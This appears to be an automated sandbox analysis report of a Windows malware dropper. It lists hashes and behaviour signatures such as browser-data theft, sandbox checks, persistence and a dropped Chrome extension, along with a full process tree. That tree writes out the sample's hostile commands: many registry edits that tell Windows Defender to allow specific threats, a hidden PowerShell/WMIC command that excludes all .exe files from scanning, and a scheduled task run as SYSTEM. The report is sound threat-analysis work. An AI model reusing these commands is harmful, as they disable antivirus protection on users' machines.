Analysis

  • max time kernel
    223s
  • max time network
    259s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-07-2024 05:04

General

  • Target

    75d824b1200381d5e090eaa558ae5b21e5d20439ad11096db48c969740ec297c.exe

  • Size

    7.2MB

  • MD5

    31fb5bb552ad3833351504298881a925

  • SHA1

    a90d72b75afb6a81e789a1f212a839ba813d9c6e

  • SHA256

    75d824b1200381d5e090eaa558ae5b21e5d20439ad11096db48c969740ec297c

  • SHA512

    4553ffa4731d7b9392426c8a4598484b1332f0cb43999e52e7a335e6cf601b9e9ce5e7042888e14cb935961897a58ae62dc85f9ecd447c7d0bb79dc64c48ae21

  • SSDEEP

    196608:91O9zTzFAjGCP9wg2uvOz5wKCLXQ5PjvT2XLVWudrf2Suzp:3OAlKPu2zaKCLXET2oudjhuN

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\75d824b1200381d5e090eaa558ae5b21e5d20439ad11096db48c969740ec297c.exe
    "C:\Users\Admin\AppData\Local\Temp\75d824b1200381d5e090eaa558ae5b21e5d20439ad11096db48c969740ec297c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:204
      • C:\Users\Admin\AppData\Local\Temp\7zS5B5E.tmp\Install.exe
        .\Install.exe /YGGEdidkiVf "385135" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1076
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4288
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:368
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4472
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:504
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3424
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3464
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:4576
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2984
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1928
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                      PID:1996
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2216
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:356
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                        PID:5076
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1420
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:760
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4520
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:4984
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4596
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4584
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2964
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:768
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "bgPWCzgNhfwtzRcEcq" /SC once /ST 05:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5B5E.tmp\Install.exe\" 3o /lZNwdidnNBP 385135 /S" /V1 /F
                    4⤵
                    • Drops file in Windows directory
                    • Scheduled Task/Job: Scheduled Task
                    PID:3744
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 684
                    4⤵
                    • Program crash
                    PID:1432
            • C:\Users\Admin\AppData\Local\Temp\7zS5B5E.tmp\Install.exe
              C:\Users\Admin\AppData\Local\Temp\7zS5B5E.tmp\Install.exe 3o /lZNwdidnNBP 385135 /S
              1⤵
              • Executes dropped EXE
              • Drops desktop.ini file(s)
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:2796
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                2⤵
                  PID:4172
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    3⤵
                      PID:1812
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        4⤵
                          PID:1756
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            5⤵
                              PID:4340
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          3⤵
                            PID:2348
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              4⤵
                                PID:4668
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  5⤵
                                    PID:4664
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                3⤵
                                  PID:4132
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    4⤵
                                      PID:1908
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        5⤵
                                          PID:2952
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                      3⤵
                                        PID:1916
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          4⤵
                                            PID:2996
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              5⤵
                                                PID:208
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            3⤵
                                              PID:3612
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                4⤵
                                                  PID:3404
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4656
                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                      6⤵
                                                        PID:2944
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                2⤵
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1804
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:316
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                      4⤵
                                                        PID:948
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:4564
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:4108
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3172
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4488
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4508
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:916
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:4148
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:3608
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:796
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:688
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:3300
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:1584
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:4792
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:512
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:2648
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:2096
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:788
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:4596
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4744
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:1088
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:1576
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:2376
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3916
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:508
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:4480
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:2948
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:5068
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
